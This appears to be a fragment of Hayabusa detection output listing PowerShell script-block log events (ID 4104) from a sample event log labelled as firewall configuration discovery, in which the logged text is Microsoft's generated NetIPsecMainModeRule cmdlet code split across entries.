[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(Pa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"rameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFire",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.801 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"wallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Va",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
